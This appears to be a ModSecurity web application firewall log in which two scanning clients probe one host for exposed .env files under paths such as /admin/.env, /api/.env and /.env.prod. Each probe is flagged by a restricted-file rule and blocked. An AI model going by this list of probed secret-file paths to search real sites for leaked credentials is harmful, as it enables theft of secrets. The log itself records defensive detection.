[Thu Sep 11 11:20:15.958854 2025] [:error] [pid 2641806] [client 195.178.110.161:57900] [client 195.178.110.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aMKUTxoLF0JPPSQEIDv1RwAAAAA"]
[Thu Sep 11 11:20:15.959025 2025] [:error] [pid 2641806] [client 195.178.110.161:57900] [client 195.178.110.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aMKUTxoLF0JPPSQEIDv1RwAAAAA"]
[Thu Sep 11 11:20:16.196382 2025] [:error] [pid 2641809] [client 195.178.110.161:57904] [client 195.178.110.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aMKUUOEVWQ_asFH7Xv3-MQAAAAM"]
[Thu Sep 11 11:20:16.196626 2025] [:error] [pid 2641809] [client 195.178.110.161:57904] [client 195.178.110.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aMKUUOEVWQ_asFH7Xv3-MQAAAAM"]
[Thu Sep 11 11:20:16.196808 2025] [:error] [pid 2641809] [client 195.178.110.161:57904] [client 195.178.110.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aMKUUOEVWQ_asFH7Xv3-MQAAAAM"]
[Thu Sep 11 11:20:32.515238 2025] [:error] [pid 2641807] [client 195.178.110.161:57942] [client 195.178.110.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aMKUYMocZ7Yf79rE2oe6IwAAAAE"]
[Thu Sep 11 11:20:32.515499 2025] [:error] [pid 2641807] [client 195.178.110.161:57942] [client 195.178.110.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aMKUYMocZ7Yf79rE2oe6IwAAAAE"]
[Thu Sep 11 11:20:32.515646 2025] [:error] [pid 2641807] [client 195.178.110.161:57942] [client 195.178.110.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aMKUYMocZ7Yf79rE2oe6IwAAAAE"]
[Thu Sep 11 11:20:37.601868 2025] [:error] [pid 2641806] [client 195.178.110.161:55834] [client 195.178.110.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aMKUZRoLF0JPPSQEIDv1SAAAAAA"]
[Thu Sep 11 11:20:37.602801 2025] [:error] [pid 2641806] [client 195.178.110.161:55834] [client 195.178.110.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aMKUZRoLF0JPPSQEIDv1SAAAAAA"]
[Thu Sep 11 11:20:37.602966 2025] [:error] [pid 2641806] [client 195.178.110.161:55834] [client 195.178.110.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aMKUZRoLF0JPPSQEIDv1SAAAAAA"]
[Thu Sep 11 11:20:42.685441 2025] [:error] [pid 2641809] [client 195.178.110.161:55838] [client 195.178.110.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aMKUauEVWQ_asFH7Xv3-MgAAAAM"]
[Thu Sep 11 11:20:42.686319 2025] [:error] [pid 2641809] [client 195.178.110.161:55838] [client 195.178.110.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aMKUauEVWQ_asFH7Xv3-MgAAAAM"]
[Thu Sep 11 11:20:42.686531 2025] [:error] [pid 2641809] [client 195.178.110.161:55838] [client 195.178.110.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aMKUauEVWQ_asFH7Xv3-MgAAAAM"]
[Sun Sep 14 01:24:41.555222 2025] [:error] [pid 2715339] [client 23.180.120.244:42524] [client 23.180.120.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aMX9OWnXB-OczeJZNik_IAAAAAI"]
[Sun Sep 14 01:24:41.556277 2025] [:error] [pid 2715339] [client 23.180.120.244:42524] [client 23.180.120.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aMX9OWnXB-OczeJZNik_IAAAAAI"]
[Sun Sep 14 01:24:41.556464 2025] [:error] [pid 2715339] [client 23.180.120.244:42524] [client 23.180.120.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aMX9OWnXB-OczeJZNik_IAAAAAI"]
[Sun Sep 14 01:24:41.767538 2025] [:error] [pid 2714503] [client 23.180.120.244:42538] [client 23.180.120.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aMX9ORS353hQKI_U7PWCjQAAAAA"]
[Sun Sep 14 01:24:41.767786 2025] [:error] [pid 2714503] [client 23.180.120.244:42538] [client 23.180.120.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aMX9ORS353hQKI_U7PWCjQAAAAA"]
[Sun Sep 14 01:24:41.767952 2025] [:error] [pid 2714503] [client 23.180.120.244:42538] [client 23.180.120.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aMX9ORS353hQKI_U7PWCjQAAAAA"]
[Sun Sep 14 01:24:41.963162 2025] [:error] [pid 2714506] [client 23.180.120.244:42554] [client 23.180.120.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aMX9Oc-yYYULFPeQPlfL5AAAAAg"]
[Sun Sep 14 01:24:41.963410 2025] [:error] [pid 2714506] [client 23.180.120.244:42554] [client 23.180.120.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aMX9Oc-yYYULFPeQPlfL5AAAAAg"]
[Sun Sep 14 01:24:41.963600 2025] [:error] [pid 2714506] [client 23.180.120.244:42554] [client 23.180.120.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aMX9Oc-yYYULFPeQPlfL5AAAAAg"]
[Sun Sep 14 01:24:42.123131 2025] [:error] [pid 2714568] [client 23.180.120.244:42558] [client 23.180.120.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aMX9OoBZ3RoT_FuaPopnyAAAAAE"]
[Sun Sep 14 01:24:42.123386 2025] [:error] [pid 2714568] [client 23.180.120.244:42558] [client 23.180.120.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aMX9OoBZ3RoT_FuaPopnyAAAAAE"]
[Sun Sep 14 01:24:42.123556 2025] [:error] [pid 2714568] [client 23.180.120.244:42558] [client 23.180.120.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aMX9OoBZ3RoT_FuaPopnyAAAAAE"]
[Sun Sep 14 01:24:42.295410 2025] [:error] [pid 2714505] [client 23.180.120.244:42570] [client 23.180.120.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aMX9OtAXT60YCZn6_X3HPgAAAAY"]
[Sun Sep 14 01:24:42.295649 2025] [:error] [pid 2714505] [client 23.180.120.244:42570] [client 23.180.120.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aMX9OtAXT60YCZn6_X3HPgAAAAY"]
[Sun Sep 14 01:24:42.295818 2025] [:error] [pid 2714505] [client 23.180.120.244:42570] [client 23.180.120.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aMX9OtAXT60YCZn6_X3HPgAAAAY"]
[Sun Sep 14 01:24:42.477542 2025] [:error] [pid 2714504] [client 23.180.120.244:42582] [client 23.180.120.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aMX9OqJXRuB8wUqZOOxrSQAAAAM"]
[Sun Sep 14 01:24:42.477818 2025] [:error] [pid 2714504] [client 23.180.120.244:42582] [client 23.180.120.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aMX9OqJXRuB8wUqZOOxrSQAAAAM"]
[Sun Sep 14 01:24:42.478017 2025] [:error] [pid 2714504] [client 23.180.120.244:42582] [client 23.180.120.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aMX9OqJXRuB8wUqZOOxrSQAAAAM"]
[Sun Sep 14 01:24:43.820062 2025] [:error] [pid 2714568] [client 23.180.120.244:42620] [client 23.180.120.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aMX9O4BZ3RoT_FuaPopnyQAAAAE"]
[Sun Sep 14 01:24:43.820301 2025] [:error] [pid 2714568] [client 23.180.120.244:42620] [client 23.180.120.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aMX9O4BZ3RoT_FuaPopnyQAAAAE"]
[Sun Sep 14 01:24:43.820463 2025] [:error] [pid 2714568] [client 23.180.120.244:42620] [client 23.180.120.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aMX9O4BZ3RoT_FuaPopnyQAAAAE"]
[Sun Sep 14 01:24:44.028547 2025] [:error] [pid 2714505] [client 23.180.120.244:42634] [client 23.180.120.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aMX9PNAXT60YCZn6_X3HPwAAAAY"]
[Sun Sep 14 01:24:44.028801 2025] [:error] [pid 2714505] [client 23.180.120.244:42634] [client 23.180.120.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aMX9PNAXT60YCZn6_X3HPwAAAAY"]
[Sun Sep 14 01:24:44.028989 2025] [:error] [pid 2714505] [client 23.180.120.244:42634] [client 23.180.120.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aMX9PNAXT60YCZn6_X3HPwAAAAY"]
[Sun Sep 14 01:24:44.245906 2025] [:error] [pid 2714504] [client 23.180.120.244:42650] [client 23.180.120.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aMX9PKJXRuB8wUqZOOxrSgAAAAM"]
[Sun Sep 14 01:24:44.246143 2025] [:error] [pid 2714504] [client 23.180.120.244:42650] [client 23.180.120.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aMX9PKJXRuB8wUqZOOxrSgAAAAM"]
[Sun Sep 14 01:24:44.246300 2025] [:error] [pid 2714504] [client 23.180.120.244:42650] [client 23.180.120.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aMX9PKJXRuB8wUqZOOxrSgAAAAM"]
